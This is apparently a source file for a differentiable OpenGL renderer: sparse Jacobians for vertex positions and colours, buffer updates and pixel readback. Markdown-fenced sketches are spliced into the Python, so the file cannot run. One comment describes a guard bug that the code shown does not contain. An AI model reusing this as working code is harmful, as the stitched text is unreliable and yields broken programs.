data = np.transpose(dImage_wrt_bar_v[facesOutsideBnd.ravel()],[1,0,2,3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bar_outside = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
### Derivatives wrt V: 6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesInsideBnd]
IS = np.tile(col(pixels), (1, 2*f.shape[1])).ravel()
faces = f[sampleFaces[facesInsideBnd]].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = np.transpose(dImage_wrt_bar_v[facesInsideBnd.ravel()], [1, 0, 2, 3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bar_inside = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
####### 3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
frontFacing = self.frontFacingEdgeFaces[(zerosIm * boundaryImage).ravel().astype(bool)].astype(bool)
frontFacingEdgeFaces = self.fpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]][frontFacing]
verticesBnd = self.v.r[f[frontFacingEdgeFaces.ravel()].ravel()].reshape([1, -1, 3])
verticesBnd = np.tile(verticesBnd, [self.nsamples, 1,1])
verticesBnd = verticesBnd.reshape([-1,3,3])[facesOutsideBnd.ravel()].reshape([-1,3])
verts = self.viewPointIntersect
fFrontEdge = np.tile(f[frontFacingEdgeFaces][None,:], [self.nsamples, 1, 1]).reshape([-1,3])[facesOutsideBnd.ravel()]
dImage_wrt_bar_v_edge = self.barycentricDerivatives(verticesBnd, fFrontEdge, verts).swapaxes(0, 1)
dImage_wrt_bar_v_edge = dImage_wrt_bar_v_edge * (1-d_final_outside[:,None,None, None]) * self.t_area_bnd_edge[:, None, None, None]
# dImage_wrt_bar_v_edge /= np.tile(self.areaWeightsTotal[None,:], [self.nsamples,1])[facesOutsideBnd][:, None, None,None]
dImage_wrt_bar_v_edge /= self.nsamples
### Derivatives wrt V:
pixels = np.tile(np.where(boundaryImage.ravel())[0][None, :], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 3 * 2)).ravel()
# faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()
faces = f[frontFacingEdgeFaces]
faces = np.tile(faces.reshape([1, -1, 3]), [self.nsamples, 1, 1])[facesOutsideBnd].ravel()
JS = col(faces)
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
data = np.transpose(dImage_wrt_bar_v_edge, [1, 0, 2, 3]).ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_bar_outside_edge = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
verticesNonBnd = self.v.r[f[nonBoundaryFaces].ravel()]
vertsPerFaceProjBnd = self.camera.r[f[nonBoundaryFaces].ravel()].reshape([-1,3,2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:, 0, :], np.ones([nv, 1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:, 1, :], np.ones([nv, 1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:, 2, :], np.ones([nv, 1])]
t_area_nonbnd = np.abs(np.linalg.det(np.concatenate([p0_proj[:, None], p1_proj[:, None], p2_proj[:, None]], axis=1)) * 0.5)
t_area_nonbnd[t_area_nonbnd> 1] = 1
bc = barycentric[((~boundaryImage)&(visibility !=4294967295 ))].reshape((-1, 3))
verts = np.sum(self.v.r[f[nonBoundaryFaces.ravel()].ravel()].reshape([-1, 3, 3]) * bc[:, :,None], axis=1)
didp = self.barycentricDerivatives(verticesNonBnd, f[nonBoundaryFaces.ravel()], verts)
didp = didp * t_area_nonbnd[None,:,None, None]
n_channels = np.atleast_3d(observed).shape[2]
shape = visibility.shape
####### 2: Take the data and copy the corresponding dxs and dys to these new pixels.
### Derivatives wrt V:
# IS = np.tile(col(visible), (1, 2*f.shape[1])).ravel()
pixels = np.where(((~boundaryImage)&(visibility !=4294967295 )).ravel())[0]
IS = np.tile(col(pixels), (1, 2*f.shape[1])).ravel()
JS = col(f[nonBoundaryFaces].ravel())
JS = np.hstack((JS*2, JS*2+1)).ravel()
if n_channels > 1:
IS = np.concatenate([IS*n_channels+i for i in range(n_channels)])
JS = np.concatenate([JS for i in range(n_channels)])
# data = np.concatenate(((visTriVC[:,0,:] * dBar1dx[:,None])[:,:,None],(visTriVC[:, 0, :] * dBar1dy[:, None])[:,:,None], (visTriVC[:,1,:]* dBar2dx[:,None])[:,:,None], (visTriVC[:, 1, :] * dBar2dy[:, None])[:,:,None],(visTriVC[:,2,:]* dBar3dx[:,None])[:,:,None],(visTriVC[:, 2, :] * dBar3dy[:, None])[:,:,None]),axis=2).swapaxes(0,1).ravel()
data = didp.ravel()
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_verts_nonbnd = sp.csc_matrix((data, ij), shape=(image_width*image_height*n_channels, num_verts*2))
# result_wrt_verts_nonbnd.sum_duplicates()
if np.any(boundaryImage):
result_wrt_verts = result_wrt_verts_bnd_outside + result_wrt_verts_bar_outside + result_wrt_verts_bar_inside + result_wrt_verts_bar_outside_edge + result_wrt_verts_nonbnd
# result_wrt_verts = result_wrt_verts_bnd_outside
else:
result_wrt_verts = result_wrt_verts_nonbnd
return result_wrt_verts
def compute_derivatives_vc(self, observed, visible, visibility, barycentric, image_width, image_height, num_verts, f):
"""Construct a sparse jacobian that relates vertex colours (in the
columns) to pixel values (in the rows)."""
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
d_final_outside = self.d_final_outside
barycentricVertsIntersect = self.barycentricVertsIntersect
boundaryImage = self.boundarybool_image.astype(bool) & (visibility != 4294967295)
zerosIm = np.ones(self.boundarybool_image.shape).astype(bool)
edge_visibility = self.boundaryid_image
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()].reshape([-1, 2, 2])
nsamples = self.nsamples
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(bool)].reshape([nsamples, -1]) - 1
sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(bool), :].reshape([nsamples, -1, 3])
nonBoundaryFaces = visibility[zerosIm * (~boundaryImage) & (visibility != 4294967295)]
if np.any(boundaryImage):
boundaryFaces = visibility[boundaryImage]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
facesInsideBnd = projFacesBndTiled == sampleFaces
facesOutsideBnd = ~facesInsideBnd
# vertsProjBnd[None, :] - sampleV[:,None,:]
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1,1,1])
vertsProjBndSamplesOutside = vertsProjBndSamples[facesOutsideBnd]
#Computing gradients:
#A multisampled pixel color is given by: w R + (1-w) R' thus:
#1 derivatives samples outside wrt v 1: (dw * (svc) - dw (bar'*vc') )/ nsamples for face sample
#2 derivatives samples outside wrt v bar outside: (w * (dbar*vc) )/ nsamples for faces sample
#3 derivatives samples outside wrt v bar edge: (1-w) (dbar'*vc') )/ nsamples for faces edge (barv1', barv2', 0)
#4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
#5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
#6 derivatives samples inside wrt v : (dbar'*vc')/ nsamples for faces sample
#7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
#for every boundary pixel i,j we have list of sample faces. compute gradients at each and sum them according to face identity, options:
# - Best: create sparse matrix for every matrix. sum them! same can be done with boundary.
####### 4 derivatives samples outside wrt vc : (w * (bar) )/ nsamples for faces sample
dImage_wrt_outside_vc_outside = d_final_outside[:,None] * sampleBarycentric[facesOutsideBnd] / self.nsamples
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None,:], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 3)).ravel()
faces = f[sampleFaces[facesOutsideBnd]].ravel()
JS = col(faces)
data = dImage_wrt_outside_vc_outside.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_bnd_outside = result
# result_wrt_vc_bnd_outside.sum_duplicates()
######## 5 derivatives samples outside wrt vc : (1-w) (bar')/ nsamples for faces edge
dImage_wrt_outside_vc_edge = (1-d_final_outside[:, None]) * np.c_[barycentricVertsIntersect, 1-barycentricVertsIntersect] / self.nsamples
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None,:], [self.nsamples, 1])[facesOutsideBnd]
IS = np.tile(col(pixels), (1, 2)).ravel()
faces = self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(bool)]].ravel()
faces = np.tile(faces.reshape([1,-1,2]),[self.nsamples, 1, 1])[facesOutsideBnd].ravel()
JS = col(faces)
data = dImage_wrt_outside_vc_edge.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_vc_bnd_outside_edge = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
# result_wrt_vc_bnd_outside_edge.sum_duplicates()
######## 7 derivatives samples inside wrt vc : (bar)/ nsamples for faces sample
dImage_wrt_outside_vc_inside = sampleBarycentric[facesInsideBnd] / self.nsamples
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.tile(np.where(boundaryImage.ravel())[0][None,:], [self.nsamples, 1])[facesInsideBnd]
IS = np.tile(col(pixels), (1, 3)).ravel()
faces = f[sampleFaces[facesInsideBnd]].ravel()
JS = col(faces)
data = dImage_wrt_outside_vc_inside.ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
ij = np.vstack((IS.ravel(), JS.ravel()))
result_wrt_vc_bnd_inside = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
# result_wrt_vc_bnd_inside.sum_duplicates()
########### Non boundary derivatives: ####################
nNonBndFaces = nonBoundaryFaces.size
verticesNonBnd = self.v.r[f[nonBoundaryFaces].ravel()]
# barySample = self.renders_sample_barycentric[0].reshape([-1,3])[(~boundaryImage)&(visibility !=4294967295 ).ravel().astype(np.bool), :]
bc = barycentric[((~boundaryImage)&(visibility !=4294967295 ))].reshape((-1, 3))
### Derivatives wrt VC:
# Each pixel relies on three verts
pixels = np.where(((~boundaryImage)&(visibility !=4294967295 )).ravel())[0]
IS = np.tile(col(pixels), (1, 3)).ravel()
JS = col(f[nonBoundaryFaces].ravel())
data = np.asarray(bc, order='C').ravel()
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data for i in range(num_channels)])
# IS = np.concatenate((IS*3, IS*3+1, IS*3+2))
# JS = np.concatenate((JS*3, JS*3+1, JS*3+2))
# data = np.concatenate((data, data, data))
ij = np.vstack((IS.ravel(), JS.ravel()))
result = sp.csc_matrix((data, ij), shape=(width * height * num_channels, vc_size))
result_wrt_vc_nonbnd = result
# result_wrt_vc_nonbnd.sum_duplicates()
if np.any(boundaryImage):
# result_wrt_verts = result_wrt_verts_bar_outside_edge
# result_wrt_verts = result_wrt_verts_nonbnd
result_wrt_vc = result_wrt_vc_bnd_outside + result_wrt_vc_bnd_outside_edge + result_wrt_vc_bnd_inside + result_wrt_vc_nonbnd
# result_wrt_vc = sp.csc_matrix((width * height * num_channels, vc_size))
else:
# result_wrt_verts = sp.csc_matrix((image_width*image_height*n_channels, num_verts*2))
result_wrt_vc = result_wrt_vc_nonbnd
# result_wrt_vc = sp.csc_matrix((width * height * num_channels, vc_size))
return result_wrt_vc
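# All the Jacobian blocks above are assembled with the same pattern: per-pixel
# barycentric weights scattered into a sparse (pixels*channels) x (colors) matrix,
# relying on csc_matrix summing duplicate entries. A minimal standalone sketch of
# that pattern (toy sizes and names, not the renderer's own variables):

```python
import numpy as np
import scipy.sparse as sp

# Toy setup: 2 pixels, each covered by one triangle of a 4-vertex mesh.
num_pixels, num_verts, num_channels = 2, 4, 3
faces = np.array([[0, 1, 2], [1, 2, 3]])             # face per pixel
bary = np.array([[0.2, 0.3, 0.5], [0.1, 0.6, 0.3]])  # barycentric weights

pixels = np.arange(num_pixels)
IS = np.tile(pixels[:, None], (1, 3)).ravel()  # row index: pixel id
JS = faces.ravel()                             # col index: vertex id
data = bary.ravel()                            # d(pixel)/d(vertex color)

# Replicate the triplets once per color channel, as in the renderer.
IS = np.concatenate([IS * num_channels + k for k in range(num_channels)])
JS = np.concatenate([JS * num_channels + k for k in range(num_channels)])
data = np.concatenate([data] * num_channels)

J = sp.csc_matrix((data, (IS, JS)),
                  shape=(num_pixels * num_channels, num_verts * num_channels))
# csc_matrix sums duplicate (i, j) entries, which is exactly what accumulates
# the contributions of multiple samples hitting the same pixel/vertex pair.
```

# Each row of J holds the barycentric weights of one pixel/channel, so rows sum to 1.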
def on_changed(self, which):
super().on_changed(which)
if 'v' in which or 'camera' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_verts_mesh[mesh][polygons].set_array(verts_by_face.astype(np.float32))
self.vbo_verts_mesh[mesh][polygons].bind()
if 'vc' in which:
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
self.vbo_colors_mesh[mesh][polygons].set_array(colors_by_face.astype(np.float32))
self.vbo_colors_mesh[mesh][polygons].bind()
if 'f' in which:
self.vbo_indices.set_array(self.f.astype(np.uint32))
self.vbo_indices.bind()
self.vbo_indices_range.set_array(np.arange(self.f.size, dtype=np.uint32).ravel())
self.vbo_indices_range.bind()
flen = 1
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
f = self.f_list[mesh][polygons]
# fc = np.arange(flen, flen + len(f))
fc = np.tile(np.arange(flen, flen + len(f))[:, None], [1, 3]).ravel()
# fc[:, 0] = fc[:, 0] & 255
# fc[:, 1] = (fc[:, 1] >> 8) & 255
# fc[:, 2] = (fc[:, 2] >> 16) & 255
fc = np.asarray(fc, dtype=np.uint32)
self.vbo_face_ids_list[mesh][polygons].set_array(fc)
self.vbo_face_ids_list[mesh][polygons].bind()
flen += len(f)
self.vbo_indices_mesh_list[mesh][polygons].set_array(np.array(self.f_list[mesh][polygons]).astype(np.uint32))
self.vbo_indices_mesh_list[mesh][polygons].bind()
if 'texture_stack' in which:
if self.initialized:
textureCoordIdx = 0
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
#Update the OpenGL textures with all the textures. (Inefficient as many might not have changed).
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
self.textures_list[mesh][polygons] = self.texture_stack[textureCoordIdx:image.size+textureCoordIdx].reshape(image.shape)
textureCoordIdx = textureCoordIdx + image.size
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_UNSIGNED_BYTE,
image.reshape([image.shape[1], image.shape[0], -1]).ravel().tobytes())
if any(key in which for key in ('v', 'f', 'vc', 'ft', 'camera', 'texture_stack')):
self.render_image_buffers()
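# The guards in on_changed test membership of several attribute names in `which`.
# A minimal illustration (with a hypothetical `which` set) of why a chained
# `'v' or 'camera' in which` guard always fires, and a correct alternative:

```python
# Python parses `'v' or 'camera' in which` as `'v' or ('camera' in which)`,
# and a non-empty string literal is always truthy, so the guard is always True.
which = {'texture_stack'}  # hypothetical changed-attributes set

buggy = bool('v' or 'camera' in which)        # always True, regardless of which
correct = bool({'v', 'camera'} & set(which))  # True only on an actual match
```

# The set-intersection form also scales to the longer attribute lists used above.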
def release_textures(self):
if hasattr(self, 'textureID_mesh_list'):
if self.textureID_mesh_list != []:
for texture_mesh in self.textureID_mesh_list:
if texture_mesh != []:
for texture in texture_mesh:
if texture is not None:
GL.glDeleteTextures(1, [texture.value])
self.textureID_mesh_list = []
@depends_on(dterms+terms)
def color_image(self):
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
no_overdraw = self.draw_color_image(with_vertex_colors=True, with_texture_on=True)
return no_overdraw
# if not self.overdraw:
# return no_overdraw
#
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
# overdraw = self.draw_color_image()
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
#
# # return overdraw * np.atleast_3d(self.boundarybool_image)
#
# boundarybool_image = self.boundarybool_image
# if self.num_channels > 1:
# boundarybool_image = np.atleast_3d(boundarybool_image)
#
# return np.asarray((overdraw*boundarybool_image + no_overdraw*(1-boundarybool_image)), order='C')
@depends_on('f', 'frustum', 'camera', 'overdraw')
def barycentric_image(self):
self._call_on_changed()
# Overload method to call without overdraw.
return self.draw_barycentric_image(self.boundarybool_image if self.overdraw else None)
@depends_on('f', 'frustum', 'camera', 'overdraw')
def visibility_image(self):
self._call_on_changed()
#Overload method to call without overdraw.
return self.draw_visibility_image(self.v.r, self.f, self.boundarybool_image if self.overdraw else None)
def image_mesh_bool(self, meshes):
self.makeCurrentContext()
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0.,0.,0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for mesh in meshes:
self.draw_index(mesh)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['width'], 3).astype(np.uint32))[:,:,0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result!=0
@depends_on(dterms+terms)
def indices_image(self):
self._call_on_changed()
self.makeCurrentContext()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0.,0.,0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for index in range(len(self.f_list)):
self.draw_index(index)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['width'], 3).astype(np.uint32))[:,:,0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result
def draw_index(self, index):
mesh = index
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
vc = self.vc_list[mesh]
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(vc.reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
colors = np.array(np.ones_like(colors_by_face) * (index) / 255.0, dtype=np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_color.bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
def draw_texcoord_image(self, v, f, ft, boundarybool_image=None):
# gl = glf
# gl.Disable(GL_TEXTURE_2D)
# gl.DisableClientState(GL_TEXTURE_COORD_ARR
self.makeCurrentContext()
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# want vtc: texture-coordinates per vertex (not per element in vc)
colors = ft
#use the third channel to identify the corresponding textures.
color3 = np.vstack([np.ones([self.ft_list[mesh].shape[0],1])*mesh for mesh in range(len(self.ft_list))]).astype(np.float32) / len(self.ft_list)
colors = np.asarray(np.hstack((colors, color3)), np.float64, order='C')
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
#Why do we need this?
if boundarybool_image is not None:
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['width'], 3)[:,:,:3].astype(np.float64))/255.0
result[:,:,1] = 1. - result[:,:,1]
return result
@depends_on('ft', 'textures')
def mesh_tex_coords(self):
# Flip the V coordinate; copy first so self.ft is not mutated in place.
data = self.ft.copy()
data[:, 1] = 1.0 - data[:, 1]
return data
# Depends on 'f' because vpe/fpe depend on f
# Pol: Check that depends on works on other attributes that depend_on x, if x changes.
@depends_on( 'ft', 'f')
def wireframe_tex_coords(self):
print("wireframe_tex_coords is being computed!")
vvt = np.zeros((self.v.r.size // 3, 2), dtype=np.float64, order='C')
vvt[self.f.flatten()] = self.mesh_tex_coords
edata = vvt[self.ma.ravel()]
return edata
# TODO: can this not be inherited from base? turning off texture mapping in that instead?
@depends_on(dterms+terms)
def boundaryid_image(self):
self._call_on_changed()
# self.texture_mapping_of
self.makeCurrentContext()
GL.glUseProgram(self.colorProgram)
result = self.draw_boundaryid_image(self.v.r, self.f, self.vpe, self.fpe, self.camera)
GL.glUseProgram(self.colorTextureProgram)
# self.texture_mapping_on(with_vertex_colors=True)
return result
def draw_color_image(self, with_vertex_colors=True, with_texture_on=True):
self.makeCurrentContext()
self._call_on_changed()
GL.glEnable(GL.GL_MULTISAMPLE)
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1%self.num_channels], self.bgcolor.r[2%self.num_channels], 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vc = colors_by_face
if with_vertex_colors:
colors = vc.astype(np.float32)
else:
# Only texture.
colors = np.ones_like(vc).astype(np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_color.bind()
if self.f.shape[1]==2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
if with_texture_on and self.haveUVs_list[mesh][polygons]:
GL.glUseProgram(self.colorTextureProgram)
texture = self.textureID_mesh_list[mesh][polygons]
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureID, 0)
else:
GL.glUseProgram(self.colorProgram)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
# GL.glDrawElements(primtype, len(vbo_f)*vbo_f.data.shape[1], GL.GL_UNSIGNED_INT, None)
if self.msaa:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_noms)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'], GL.GL_COLOR_BUFFER_BIT, GL.GL_LINEAR)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(self.frustum['height'], self.frustum['width'], 3).astype(np.float64))/255.0
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glClearColor(0.,0.,0., 1.)
if hasattr(self, 'background_image'):
bg_px = np.tile(np.atleast_3d(self.visibility_image) == 4294967295, (1,1,3))
fg_px = 1 - bg_px
result = bg_px * self.background_image + fg_px * result
return result
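# draw_color_image (and the other readback sites) turn the flat glReadPixels
# buffer into an image: the raw bytes arrive bottom scanline first, so the array
# is reshaped to (height, width, 3) and flipped vertically. A standalone sketch
# of that step with a synthetic buffer in place of a real GL readback:

```python
import numpy as np

height, width = 2, 3
# Synthetic raw readback: bottom scanline first, 3 RGB bytes per pixel.
raw = bytes(range(height * width * 3))

img = np.flipud(
    np.frombuffer(raw, np.uint8).reshape(height, width, 3)
).astype(np.float64) / 255.0
# img[0] is now the top row of the image; values are normalized to [0, 1].
```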
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image_quantized(self):
texcoord_image = self.texcoord_image[:,:, :2].copy()
#Temporary:
self.texture_image = self.textures_list[0][0].r.copy()
texcoord_image[:,:,0] *= self.texture_image.shape[1]-1
texcoord_image[:,:,1] *= self.texture_image.shape[0]-1
texture_idx = (self.texcoord_image[:,:,2]*len(self.ft_list)).astype(np.uint32)
texcoord_image = np.round(texcoord_image)
texcoord_image = texcoord_image[:,:,0] + texcoord_image[:,:,1]*self.texture_image.shape[1]
return texcoord_image, texture_idx
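# texcoord_image_quantized maps normalized UVs to flat row-major texel indices.
# A standalone sketch of that mapping on a toy texture (toy sizes, hypothetical
# names, independent of the renderer's attributes):

```python
import numpy as np

tex_h, tex_w = 4, 8  # toy texture resolution
uv = np.array([[0.0, 0.0], [1.0, 1.0], [0.5, 0.25]])  # normalized (u, v)

cols = np.round(uv[:, 0] * (tex_w - 1))  # u -> column in [0, tex_w - 1]
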